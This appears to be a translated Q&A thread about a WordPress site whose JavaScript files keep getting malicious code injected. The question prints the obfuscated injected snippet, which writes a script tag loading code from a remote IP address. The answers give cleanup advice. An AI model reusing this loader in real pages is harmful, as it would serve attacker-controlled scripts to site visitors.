wordpress网站(基于主题)继续注入恶意代码

时间:2017-10-24 15:23:27

标签: javascript php wordpress themes virus

我有一个基于主题的wordpress网站,但由于过去几天网站插件无法正常工作,我找到的原因是“。js”扩展文件正在注入恶意代码

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

采取措施避免它

  • 限制写入文件的权限。
  • 阻止 ftp 被其他任何 ip 访问。
  • 尝试从整个网站删除代码。
  • 上传了备份文件。 但仍然不知何故,代码继续注入几乎所有 javascript 文件

2 个答案:

答案 0 :(得分:1)

你必须找到文件:“db.php”并删除感染的代码。同时,您必须删除“.js”文件中感染的所有代码。 https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection

答案 1 :(得分:0)

马上关闭,我认为您的备份可能已损坏。我不知道它是否在您的感染之前,但它是要检查的东西。此外,尝试禁用/删除插件 - 一个可能是易受攻击的或受感染的。查看db.php和.js文件中的受感染代码并将其删除。

如果你的备份不好,你必须通过所有代码找到坏位并删除它们。或者,如果您可以花时间并拥有干净的源代码内容,您可以将整个事情擦除并重新开始。这是一个可怕的想法,但有时这是解决方案。

相关问题
最新问题